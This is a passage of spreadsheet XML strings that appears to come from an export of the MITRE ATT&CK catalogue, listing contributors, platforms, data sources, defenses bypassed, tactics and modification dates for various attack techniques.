    <t>Brent Murphy, Elastic, David French, Elastic, Ricardo Dias, Red Canary</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</si>
  <si>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</si>
  <si>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Windows, SaaS, IaaS, Linux, macOS, Office 365</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Traffic Content, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Praetorian, ExtraHop, Jannie Li, Microsoft Threat Intelligence Center (MSTIC)</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Flow, Drive: Drive Creation, Application Log: Application Log Content</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</si>
  <si>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</si>
  <si>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Windows, Linux, macOS, IaaS, Network</t>
  </si>
  <si>
    <t>User Account: User Account Metadata, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Regina Elwell, Sudhanshu Chauhan, @Sudhanshu_C, Isif Ibrahima, Mandiant, Austin Clark, @c2defense</t>
  </si>
  <si>
    <t>Static File Analysis, Application Control</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</si>
  <si>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</si>
  <si>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Linux, Windows, macOS, IaaS, Containers</t>
  </si>
  <si>
    <t>Instance: Instance Start, File: File Creation, Network Traffic: Network Connection Creation, Container: Container Creation, Instance: Instance Creation, Network Traffic: Network Traffic Content, Process: Process Creation, Command: Command Execution, Image: Image Creation, Application Log: Application Log Content, Container: Container Start</t>
  </si>
  <si>
    <t>File: File Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Connection Creation</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</si>
  <si>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</si>
  <si>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Process: Process Creation, File: File Creation</t>
  </si>
  <si>
    <t>IaaS, Containers</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Image: Image Creation, Container: Container Start, Container: Container Creation, Instance: Instance Start, Instance: Instance Creation</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID), Vishwas Manral, McAfee</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</si>
  <si>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</si>
  <si>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defense-evasion, persistence, command-and-control</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Connection Creation, Process: Process Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Tony Lee, Josh Day, Gigamon</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1205/002</t>
  </si>
  <si>
    <t>Identify running processes with raw sockets. Ensure processes listed have a need for an open raw socket and are in accordance with enterprise policy.(Citation: crowdstrike bpf socket filters)</t>
  </si>
  <si>
    <t>Process: Process Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Tim (Wadhwa-)Brown, CrowdStrike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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Modification, Network Traffic: Network Traffic Content, User Account: User Account Authentication, Active Directory: Active Directory Object Creation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Linux, Windows, macOS, SaaS, IaaS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</si>
  <si>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</si>
  <si>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Linux, Windows, macOS, Azure AD</t>
  </si>
  <si>
    <t>User Account: User Account Authentication, Process: Process Creation, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>John Lambert, Microsoft Threat Intelligence Center, Mohit Rathore</t>
  </si>
  <si>
    <t>Linux, Windows, macOS, SaaS, Office 365, Google Workspace, IaaS</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Naveen Vijayaraghavan, Nilesh Dherange (Gurucul), Regina Elwell, Praetorian, Milos Stojadinovic, Isif Ibrahima, Mandiant</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</si>
  <si>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</si>
  <si>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18 October 2022</t>
  </si>
  <si>
    <t>Itamar Mizrahi, Cymptom, Toby Kohlenberg, Josh Liburdi, @jshlbrd</t>
  </si>
  <si>
    <t>System Script Proxy Execution</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</si>
  <si>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</si>
  <si>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Praetorian, Wes Hurd</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Command: Command Execution, Script: Script Execution</t>
  </si>
  <si>
    <t>Digital Certificate Validation, Application Control</t>
  </si>
  <si>
    <t>Browser Information Discovery</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</si>
  <si>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</si>
  <si>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Mike Kemmerer, Manikantan Srinivasan, NEC Corporation India, Yinon Engelsman, Talon Cyber Security, Yonatan Gotlib, Talon Cyber Security</t>
  </si>
  <si>
    <t>System Binary Proxy Execution</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</si>
  <si>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</si>
  <si>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3.0</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Windows Registry: Windows Registry Key Modification, Module: Module Load, File: File Creation, Process: OS API Execution, Process: Process Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>Nishan Maharjan, @loki248, Hans Christoffer Gaardløs, Praetorian, Wes Hurd</t>
  </si>
  <si>
    <t>18 October 2023</t>
  </si>
  <si>
    <t>File: File Creation, Process: Process Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>Digital Certificate Validation, Application control</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Windows Registry: Windows Registry Key Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Connection Creation, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Nik Seetharaman, Palantir, Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</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</si>
  <si>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</si>
  <si>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Travis Smith, Tripwire, Casey Smith</t>
  </si>
  <si>
    <t>Process: Process Creation, File: File Creation, Command: Command Execution, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>@ionstorm, Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank, Ricardo Dias</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</si>
  <si>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</si>
  <si>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Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>Ziv Kaspersky, Cymptom, Alexandros Pappas</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: Process Creation, Module: Module Load</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Module: Module Load, Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Digital Certificate Validation, Anti-virus, Application control</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Command: Command Execution, File: File Metadata, Module: Module Load</t>
  </si>
  <si>
    <t>Gareth Phillips, Seek Ltd., Casey Smith, Ricardo Dias, James_inthe_box, Me</t>
  </si>
  <si>
    <t>Digital Certificate Validation, Application control, Anti-virus</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</si>
  <si>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</si>
  <si>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25 October 2022</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>28 September 2023</t>
  </si>
  <si>
    <t>Process: Process Creation, Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Matt Kelly, @breakersall, Zachary Stanford, @svch0st</t>
  </si>
  <si>
    <t>Avneet Singh, Casey Smith, Praetorian</t>
  </si>
  <si>
    <t>Anti-virus, Digital Certificate Validation, Application Control</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Traffic: Network Connection Creation, Process: Process Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Michael Raggi @aRtAGGI, Brian Wiltse @evalstrings, Patrick Campbell, @pjcampbe11</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch, Jan Miller, CrowdStrike</t>
  </si>
  <si>
    <t>Command: Command Execution, Active Directory: Active Directory Object Modification, Process: Process Creation, File: File Metadata</t>
  </si>
  <si>
    <t>Process: Process Creation, File: File Metadata, Command: Command Execution</t>
  </si>
  <si>
    <t>Anti-virus, Host Forensic Analysis, Signature-based Detection, Static File Analysis</t>
  </si>
  <si>
    <t>Process: Process Creation, Command: Command Execution, Script: Script Execution, Network Traffic: Network Traffic Content, Process: OS API Execution</t>
  </si>
  <si>
    <t>Dave Westgard, Elia Florio, Microsoft, Mnemonic, RedHuntLabs, @redhuntlabs, ExtraHop</t>
  </si>
  <si>
    <t>Windows, Azure AD</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Deletion, Active Directory: Active Directory Object Creation, Command: Command Execution, Active Directory: Active Directory Object Modification</t>
  </si>
  <si>
    <t>System access controls, File system access controls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</si>
  <si>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</si>
  <si>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Command: Command Execution, Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Active Directory: Active Directory Object Deletion</t>
  </si>
  <si>
    <t>Itamar Mizrahi, Cymptom, Tristan Bennett, Seamless Intelligence</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Active Directory: Active Directory Object Modification, Active Directory: Active Directory Object Creation</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender, Praetorian</t>
  </si>
  <si>
    <t>impact</t>
  </si>
  <si>
    <t>Windows, IaaS, Linux, macOS, Containers</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Deletion, Process: Process Creation, File: File Deletion, Image: Image Deletion, Instance: Instance Deletion, File: File Modification, Volume: Volume Deletion, Cloud Storage: Cloud Storage Deletion, Command: Command Execution</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic, David French, Elastic, Syed Ummar Farooqh, McAfee, Prasad Somasamudram, McAfee, Sekhar Sarukkai, McAfee, Varonis Threat Labs, Joey Lei</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</si>
  <si>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</si>
  <si>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File: File Modification, Cloud Storage: Cloud Storage Modification, Network Share: Network Share Access, File: File Creation, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Oleg Kolesnikov, Securonix, Mayuresh Dani, Qualys, Harshal Tupsamudre, Qualys, Travis Smith, Qualys, ExtraHop</t>
  </si>
  <si>
    <t>Process: Process Creation, Process: Process Termination, Windows Registry: Windows Registry Key Modification, Command: Command Execution, File: File Modification, Process: OS API Execution, Service: Service Metadata</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows, macOS, Linux, Network, IaaS, Containers</t>
  </si>
  <si>
    <t>Process: Process Creation, Windows Registry: Windows Registry Key Modification, Cloud Storage: Cloud Storage Deletion, Command: Command Execution, Service: Service Metadata, Snapshot: Snapshot Deletion, File: File Deletion</t>
  </si>
  <si>
    <t>Yonatan Gotlib, Deep Instinct, Austin Clark, @c2defense, Pallavi Sivakumaran, WithSecure, Joey Lei</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Content, File: File Creation, Application Log: Application Log Content, File: File Modification</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</si>
  <si>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</si>
  <si>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File: File Creation, Network Traffic: Network Traffic Content, Application Log: Application Log Content, File: File Modification</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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, File: File Modification, File: File Creation, Network Traffic: Network Traffic Content</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</si>
  <si>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</si>
  <si>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31 August 2022</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</si>
  <si>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</si>
  <si>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02 October 2023</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, File: File Creation, Network Traffic: Network Connection Creation, Sensor Health: Host Status, Process: Process Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>David Fiser, @anu4is, Trend Micro, Alfredo Oliveira, Trend Micro, Jay Chen, Palo Alto Networks, Magno Logan, @magnologan, Trend Micro, Vishwas Manral, McAfee, Yossi Weizman, Azure Defender Research Team, Goldstein Menachem</t>
  </si>
  <si>
    <t>defense-evasion, discovery</t>
  </si>
  <si>
    <t>Deloitte Threat Library Team, Sunny Neo</t>
  </si>
  <si>
    <t>Static File Analysis, Signature-based detection, Host forensic analysis, Anti-virus</t>
  </si>
  <si>
    <t>Anti-virus, Static File Analysis, Signature-based detection, Host forensic analysis</t>
  </si>
  <si>
    <t>Jorge Orchilles, SCYTHE, Ruben Dodge, @shotgunner101, Jeff Felling, Red Canary, Deloitte Threat Library Team</t>
  </si>
  <si>
    <t>Host forensic analysis, Signature-based detection, Static File Analysis, Anti-virus</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Sensor Health: Host Status, Network Traffic: Network Traffic Flow</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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro, David Fiser, @anu4is, Trend Micro, Magno Logan, @magnologan, Trend Micro, Vishwas Manral, McAfee, Yossi Weizman, Azure Defender Research Team</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content, Sensor Health: Host Status</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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Sensor Health: Host Status, Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content, Sensor Health: Host Status, Application Log: Application Log Content</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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Sensor Health: Host Status, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Flow, Application Log: Application Log Content, File: File Modification, File: File Creation, Process: Process Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Windows, Linux</t>
  </si>
  <si>
    <t>Carlos Borges, @huntingneo, CIP, Lucas da Silva Pereira, @vulcanunsec, CIP, Kaspersky</t>
  </si>
  <si>
    <t>File: File Creation, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>ESET, Christoffer Strömblad</t>
  </si>
  <si>
    <t>SYSTEM, Administrator, root</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</si>
  <si>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</si>
  <si>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Linux, Windows, macOS, Network</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Process: Process Creation, File: File Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, File: File Modification</t>
  </si>
  <si>
    <t>File: File Creation, Command: Command Execution, File: File Modification</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1505/005</t>
  </si>
  <si>
    <t>28 March 2022</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</si>
  <si>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</si>
  <si>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Module: Module Load, Command: Command Execution, File: File Modification, Windows Registry: Windows Registry Key Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>Process: OS API Execution, Command: Command Execution, Process: Process Creation, Firewall: Firewall Enumeration, Firewall: Firewall Metadata</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Firewall: Firewall Metadata, Command: Command Execution, Process: OS API Execution, Firewall: Firewall Enumeration</t>
  </si>
  <si>
    <t>Isif Ibrahima, Mandiant</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</si>
  <si>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</si>
  <si>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Image: Image Metadata, Image: Image Creation, Image: Image Modification</t>
  </si>
  <si>
    <t>Yossi Weizman, Azure Defender Research Team, Vishwas Manral, McAfee, Praetorian</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</si>
  <si>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</si>
  <si>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Suzy Schapperle - Microsoft Azure Red Team, Praetorian, Thanabodi Phrakhun, I-SECURE</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</si>
  <si>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</si>
  <si>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19 September 2023</t>
  </si>
  <si>
    <t>SaaS, Office 365, Azure AD, Google Workspace, Containers</t>
  </si>
  <si>
    <t>Suzy Schapperle - Microsoft Azure Red Team, Shailesh Tiwary (Indian Army), Mark Wee, Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services), Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC), Ram Pliskin, Microsoft Azure Security Center, Jack Burns, HubSpot</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: Process Creation, Sensor Health: Host Status, Command: Command Execution</t>
  </si>
  <si>
    <t>Austin Clark, @c2defense, Hubert Mank</t>
  </si>
  <si>
    <t>Data from Cloud Storage</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</si>
  <si>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</si>
  <si>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IaaS, SaaS, Google Workspace, Office 365</t>
  </si>
  <si>
    <t>Netskope, Praetorian, AppOmni</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</si>
  <si>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</si>
  <si>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Linux, macOS, Windows, Office 365, SaaS</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Modification, User Account: User Account Deletion</t>
  </si>
  <si>
    <t>Hubert Mank</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows, macOS, Linux, Office 365, SaaS, Google Workspace</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Tim MalcomVetter, Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)</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</si>
  <si>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</si>
  <si>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Cloud Storage: Cloud Storage Modification, Snapshot: Snapshot Creation, Snapshot: Snapshot Modification, Cloud Storage: Cloud Storage Metadata, Snapshot: Snapshot Metadata, Network Traffic: Network Traffic Content, Cloud Storage: Cloud Storage Creation</t>
  </si>
  <si>
    <t>Praetorian, Darin Smith, Cisco, ExtraHop</t>
  </si>
  <si>
    <t>Azure AD, Office 365, IaaS, Google Workspace</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</si>
  <si>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</si>
  <si>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03 August 2023</t>
  </si>
  <si>
    <t>Linux, macOS, Windows, Office 365, SaaS, Google Workspace</t>
  </si>
  <si>
    <t>Process: Process Access, File: File Access</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC), Johann Rehberger</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</si>
  <si>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</si>
  <si>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Linux, Windows, Network, macOS</t>
  </si>
  <si>
    <t>Drive: Drive Modification, Network Traffic: Network Connection Creation, Process: OS API Execution, Driver: Driver Metadata, Command: Command Execution, Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, File monitoring</t>
  </si>
  <si>
    <t>persistence, defense-evasion</t>
  </si>
  <si>
    <t>Jean-Ian Boutin, ESET, McAfee, Ryan Becwar</t>
  </si>
  <si>
    <t>Host intrusion prevention systems, Anti-virus, File monitoring</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</si>
  <si>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</si>
  <si>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Firmware: Firmware Modification, Process: OS API Execution, Driver: Driver Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Firmware: Firmware Modification</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</si>
  <si>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</si>
  <si>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Service: Service Creation, Driver: Driver Load, Service: Service Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification, File: File Modification, File: File Creation, Windows Registry: Windows Registry Key Creation, Process: OS API Execution, Command: Command Execution</t>
  </si>
  <si>
    <t>File: File Modification, Service: Service Modification, File: File Creation, Service: Service Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>Antonio Piazza, @antman1p</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</si>
  <si>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
  </si>
  <si>
    <t>09 October 2023</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Modification, Service: Service Creation, Service: Service Modification, Process: Process Creation, File: File Creation</t>
  </si>
  <si>
    <t>Tony Lambert, Red Canary, Emad Al-Mousa, Saudi Aramco, Tim (Wadhwa-)Brown</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</si>
  <si>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</si>
  <si>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15 September 2023</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification, Process: Process Creation, Network Traffic: Network Traffic Flow, Service: Service Creation, Command: Command Execution, File: File Metadata, Windows Registry: Windows Registry Key Creation, Driver: Driver Load, Service: Service Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward, Pedro Harrison, Mayuresh Dani, Qualys, Wietze Beukema, @wietze, Akshat Pradhan, Qualys</t>
  </si>
  <si>
    <t>Process: Process Creation, File: File Creation, File: File Modification, Service: Service Modification, Command: Command Execution, Service: Service Creation</t>
  </si>
  <si>
    <t>root, Administrator</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</si>
  <si>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</si>
  <si>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privilege-escalation, persistence</t>
  </si>
  <si>
    <t>Linux, macOS, Windows, SaaS, IaaS, Office 365</t>
  </si>
  <si>
    <t>Module: Module Load, WMI: WMI Creation, File: File Metadata, File: File Creation, File: File Modification, Windows Registry: Windows Registry Key Modification, Command: Command Execution, Cloud Service: Cloud Service Modification, Process: Process Creation</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Command: Command Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Travis Smith, Tripwire, Stefan Kanthak</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</si>
  <si>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</si>
  <si>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File: File Modification, File: File Creation, Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: Process Creation, Command: Command Execution, WMI: WMI Creation</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic, David French, Elastic</t>
  </si>
  <si>
    <t>Unix Shell Configuration Modification</t>
  </si>
  <si>
    <t>Process: Process Creation, File: File Creation, Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>Robert Wilson, Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>File: File Creation, Process: Process Creation, Command: Command Execution, File: File Modification</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Metadata, Process: Process Creation, File: File Modification, Module: Module Load</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Windows Registry: Windows Registry Key Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Process: Process Creation, Command: Command Execution, File: File Creation, File: File Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Module: Module Load, Command: Command Execution, Process: OS API Execution, Windows Registry: Windows Registry Key Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>Process: Process Creation, Command: Command Execution, Module: Module Load, Windows Registry: Windows Registry Key Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>File: File Modification, Module: Module Load, Windows Registry: Windows Registry Key Modification, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Windows Registry: Windows Registry Key Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>20 October 2023</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</si>
  <si>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</si>
  <si>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File: File Modification, Command: Command Execution, Process: Process Creation, File: File Creation</t>
  </si>
  <si>
    <t>Allen DeRyke, ICE, Matt Green, @mgreen27</t>
  </si>
  <si>
    <t>File: File Creation, Command: Command Execution, Process: Process Creation, File: File Modification</t>
  </si>
  <si>
    <t>Process: Process Creation, Module: Module Load, Windows Registry: Windows Registry Key Modification, Command: Command Execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/016</t>
  </si>
  <si>
    <t>27 September 2022</t>
  </si>
  <si>
    <t>Process: Process Creation, Command: Command Execution, File: File Creation</t>
  </si>
  <si>
    <t>Brandon Dalton @PartyD0lphin</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</si>
  <si>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</si>
  <si>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Process: OS API Execution, Module: Module Load, Command: Command Execution, File: File Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification, File: File Modification, Kernel: Kernel Module Load, Process: Process Creation, Driver: Driver Load</t>
  </si>
  <si>
    <t>User, Administrator, root</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</si>
  <si>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</si>
  <si>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Oddvar Moe, @oddvarmoe, Dray Agha, @Purp1eW0lf, Huntress Labs, Harun Küßner</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Windows Registry: Windows Registry Key Modification, Module: Module Load</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: Process Creation, Command: Command Execution, Windows Registry: Windows Registry Key Modification, Module: Module Load</t>
  </si>
  <si>
    <t>SYSTEM, Administrator</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Wayne Silva, F-Secure Countercept, Anastasios Pingios, Jeremy Galloway, Red Canary, Eric Kaiser @ideologysec</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Module: Module Load, File: File Creation, Driver: Driver Load, File: File Modification</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</si>
  <si>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</si>
  <si>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File: File Modification, Process: Process Creation, File: File Creation</t>
  </si>
  <si>
    <t>David French, Elastic, Bobby, Filar, Elastic, Travis Smith, Tripwire</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows Registry: Windows Registry Key Modification, File: File Creation, Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>Stefan Kanthak, Travis Smith, Tripwire</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</si>
  <si>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</si>
  <si>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04 October 2023</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification, File: File Creation, Driver: Driver Load, Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>Mathieu Tartare, ESET, Tahseen Bin Taj</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Windows Registry: Windows Registry Key Creation, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Process: Process Creation, File: File Creation, File: File Modification</t>
  </si>
  <si>
    <t>privilege-escalation, defense-evasion</t>
  </si>
  <si>
    <t>Linux, macOS, Windows, Office 365, IaaS, Google Workspace, Azure AD</t>
  </si>
  <si>
    <t>Process: Process Creation, User Account: User Account Modification, Command: Command Execution, Process: OS API Execution, File: File Modification, Process: Process Metadata, File: File Metadata, Windows Registry: Windows Registry Key Modification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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows Registry: Windows Registry Key Modification, Command: Command Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>Stefan Kanthak, Casey Smith</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</si>
  <si>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</si>
  <si>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File: File Modification, Command: Command Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>Process: Process Creation, Process: OS API Execution</t>
  </si>
  <si>
    <t>Jimmy Astle, @AstleJimmy, Carbon Black, Erika Noerenberg, @gutterchurl, Carbon Black</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</si>
  <si>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Google Cloud Just in Time Access 2023)(Citation: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account.(Citation: Google Cloud Service Account Authentication Roles)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</si>
  <si>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https://attack.mitre.org/techniques/T1548/005</t>
  </si>
  <si>
    <t>IaaS, Azure AD, Office 365</t>
  </si>
  <si>
    <t>Arad Inbar, Fidelis Security</t>
  </si>
  <si>
    <t>defense-evasion, lateral-movement</t>
  </si>
  <si>
    <t>Windows, Office 365, SaaS, Google Workspace, IaaS, Containers</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Active Directory: Active Directory Credential Request, Web Credential: Web Credential Usage, User Account: User Account Authentication</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Office 365, SaaS, Google Workspace, Containers, IaaS, Azure AD</t>
  </si>
  <si>
    <t>Shailesh Tiwary (Indian Army), Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC), Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services), Mark Wee, Ian Davila, Tidal Cyber, Dylan Silva, AWS Security, Jack Burns, HubSpot</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Active Directory: Active Directory Credential Request, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender, Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>User Account: User Account Authentication, Logon Session: Logon Session Creation, Active Directory: Active Directory Credential Request</t>
  </si>
  <si>
    <t>Vincent Le Toux, Ryan Becwar</t>
  </si>
  <si>
    <t>Office 365, SaaS, Google Workspace, IaaS</t>
  </si>
  <si>
    <t>Johann Rehberger, Jack Burns, HubSpot</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Access, Application Log: Application Log Content, Command: Command Execution, Process: Process Creation, File: File Access, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>23 August 2023</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, File: File Access</t>
  </si>
  <si>
    <t>Rory McCune, Aqua Security, Jay Chen, Palo Alto Networks, Yossi Weizman, Azure Defender Research Team, Vishwas Manral, McAfee, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Process: Process Creation, Command: Command Execution, Windows Registry: Windows Registry Key Access</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</si>
  <si>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</si>
  <si>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</si>
  <si>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12 April 2023</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</si>
  <si>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</si>
  <si>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Itzik Kotler, SafeBreach, Austin Clark, @c2defense</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</si>
  <si>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</si>
  <si>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21 March 2023</t>
  </si>
  <si>
    <t>User Account: User Account Authentication, Command: Command Execution</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID), Jay Chen, Palo Alto Networks, Yossi Weizman, Azure Defender Research Team</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/008</t>
  </si>
  <si>
    <t>11 April 2023</t>
  </si>
  <si>
    <t>Office 365, SaaS, Google Workspace</t>
  </si>
  <si>
    <t>Douglas Weir</t>
  </si>
  <si>
    <t>Module: Module Load, Windows Registry: Windows Registry Key Creation, File: File Metadata, Command: Command Execution, Process: Process Creation, File: File Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Anti-virus, Autoruns Analysis, Digital Certificate Validation, User Mode Signature Validation, Windows User Account Control, Application Control</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Command: Command Execution, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>Brandon Dalton @PartyD0lphin, Swasti Bhushan Deb, IBM India Pvt. Ltd.</t>
  </si>
  <si>
    <t>Anti-virus, Application Control</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</si>
  <si>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</si>
  <si>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22 September 2022</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification, Module: Module Load, File: File Modification</t>
  </si>
  <si>
    <t>Autoruns Analysis, Digital Certificate Validation, User Mode Signature Validation, Application Control</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Matt Graeber, @mattifestation, SpecterOps, Red Canary, Travis Smith, Tripwire, Itzik Kotler, SafeBreach</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</si>
  <si>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</si>
  <si>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22 March 2023</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</si>
  <si>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</si>
  <si>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User Mode Signature Validation, Digital Certificate Validation, Application Control</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</si>
  <si>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Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.</t>
  </si>
  <si>
    <t>File: File Deletion, File: File Modification, File: File Metadata, File: File Creation</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials.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</si>
  <si>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30 September 2023</t>
  </si>
  <si>
    <t>File: File Access, Command: Command Execution, Process: Process Access, Cloud Service: Cloud Service Enumeration, Process: Process Creation, Process: OS API Execution</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: Process Creation, Process: OS API Execution, File: File Access</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: Process Access, File: File Access, Process: OS API Execution</t>
  </si>
  <si>
    <t>Ryan Benson, Exabeam, Barry Shteiman, Exabeam, Sylvain Gil, Exabeam, RedHuntLabs, @redhuntlabs</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</si>
  <si>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</si>
